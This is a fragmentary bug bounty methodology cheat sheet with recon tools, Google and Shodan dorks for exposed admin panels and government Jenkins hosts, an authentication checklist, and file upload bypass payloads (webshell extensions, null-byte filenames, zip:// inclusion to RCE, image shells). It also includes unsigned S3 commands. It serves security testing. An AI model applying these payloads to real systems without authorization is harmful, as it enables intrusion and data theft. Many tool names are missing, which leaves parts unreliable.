Bug Bounty
Last updated
Last updated
Custom Header Setup
Steps to Add Custom Header in Burp Requests
Select Proxy -> Options
Go to Match and Replace and select add
Specify the details of the match and replace as shown below
Type: Request Header
Match: Leave blank to add a new header
Replace: hacker@bugbounty.site
Comment: Manually BBP header
Information Gathering
- often blocked by organizations for gray hat searches - scans less frequently than LeakIX but whitelisted - best overall scanner but without vulnerability discovery - Real-time Recon/DNS data for Public Bug Bounty Programs - automated recon and vulnerability scanner - tool used to discover exposed hosts on the internet using multiple search engines - Active Reconnaissance Tool - collection of bash and python scripts that installs common tools for recon scans and asset discovery
- Security check scanner that is based on templates; Get started with Nuclei - Visually navigate available nuclei templates - collect and organize other custom templates
Getting started with some CVE scanning using Nuclei templates:
Mass security testing on subdomains:
-rl
, -rate-limit int maximum number of requests to send per second (default 150)
-rlm
, -rate-limit-minute int maximum number of requests to send per minute
Combining nuclei scanner with CENT custom templates
intitle:"index of /.git/"
Searching for Directories
allintext:index filetype:git
Search for extensions
inurl:"index.php?id="
Searching for PHP pages
inurl:"admin/dashboard.php" site:.com
Searching for PHP admin dashboards
Intitle: "login" "admin" site:http://site.com
Searching for admin login pages
intitle:"Index of /" .htaccess site:http://site.com
Searching for exposed Apache configuration file
site:website.com inurl:"contact" | inurl:"contact-us" | inurl:"contactus" | inurl:"contcat_us" | inurl:"contact_form" | inurl:"contact-form"
Searching for possible contact form
inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example[.]com
SSRF Prone Parameters
hostname:".gov" product:"Jenkins" 200
Searching Jenkins instances in .gov
ssl.cert.subject.CN:"*.google.com"+200
Returns all SSL services that has issued a certificate for *.google.com with an HTTP response code of 200.
ssl.cert.issuer.cn:"DOD SW CA-60" 200
Returns all SSL certificates that have been issued by the DoD with response code of 200
Defense Evasion
Attempt to bypass application protections such as Cloudflare, Akamai, etc.
Check to see if application is behind a WAF
Authentication:
Registration
Input validation
Analysis
Misc
Password reset process
Password reset tokens (expiration/reuse)
Failed retry lockout (DoS)
Password policies
Update profile information without asking password
Default or easy to guess keys
User enumeration
HTTP Authentication
Authentication Bypass
Identify weak authentication channels (Find primary mechanism and identify secondary mechanicsm / methods [Mobile App, Call Center, SSO])
Authorization:
Session:
General:
File Upload:
Extensions Impact
ASP
, ASPX
, PHP5
, PHP
, PHP3
: Webshell, RCE
SVG
: Stored XSS, SSRF, XXE
GIF
: Stored XSS, SSRF
CSV
: CSV injection
XML
: XXE
AVI
: LFI, SSRF
HTML
, JS
: HTML injection, XSS, Open redirect
PNG
, JPEG
: Pixel flood attack (DoS)
ZIP
: RCE via LFI, DoS
PDF
, PPTX
: SSRF, BLIND XXE
Blacklisting Bypass
PHP → .phtm
, phtml
, .phps
, .pht
, .php2
, .php3
, .php4
, .php5
, .shtml
, .phar
, .pgif
, .inc
ASP → asp
, .aspx
, .cer
, .asa
Jsp → .jsp
, .jspx
, .jsw
, .jsv
, .jspf
Coldfusion → .cfm
, .cfml
, .cfc
, .dbm
Using random capitalization → .pHp
, .pHP5
, .PhAr
Whitelisting Bypass
file.jpg.php
file.php.jpg
file.php.blah123jpg
file.php%00.jpg
file.php\x00.jpg
this can be done while uploading the file too, name it file.phpD.jpg
and change the D (44) in hex to 00.
file.php%00
file.php%20
file.php%0d%0a.jpg
file.php.....
file.php/
file.php.\
file.php#.png
file.
.html
Misc
Uploading file.js
& file.config
(web.config)
Pixel flood attack using image
DoS with a large values name: 1234...99.png
Zip Slip
If a site accepts .zip
file, upload .php
and compress it into .zip
and upload it. Now visit, site.com/path?page=zip://path/file.zip%23rce.php
Image Shell
Exiftool is a great tool to view and manipulate exif-data. Then I will to rename the file mv pic.jpg pic.php.jpg
Adobe Experience Manager (AEM) Configuration Testing
Shodan Dork:
http.component:"Adobe Experience Manager"
Daily updated Text file of all domains within scope on active Bug Bounty Programs
Sensitive Information Exposure methods Use gitdumper.sh or
Worth a shot to use the tool by by @
Convert JWT to a format crackable by John python3
/ aws s3 cp test.txt s3://target --no-sign-request aws s3 ls s3://target --no-sign-request
****
Abusing the "Upload from URL", if this image is going to be saved in some public site, you could also indicate a URL from and steal information of every visitor.
Resources
Dump In-scope Assets from BBPs using repo from
from with beginner explanation
`` is a tool for detecting vulnerabilities and misconfigurations in web applications. The -as
flag stands for "active scan", which means that the tool will perform various types of requests to the target web application in order to identify potential vulnerabilities. The -silent
flag suppresses output, and the -o
flag specifies an output file for the results. The input for this command is the list of IP addresses and ports extracted from the Shodan search results.
is a tool for performing OSINT (Open Source Intelligence) on IP addresses. The input for this command appears to be the list of IP addresses and ports extracted from the Shodan search results, and the -
flag tells the tool to read the input from standard input (stdin). The results are written to the file testing_nrich.out
.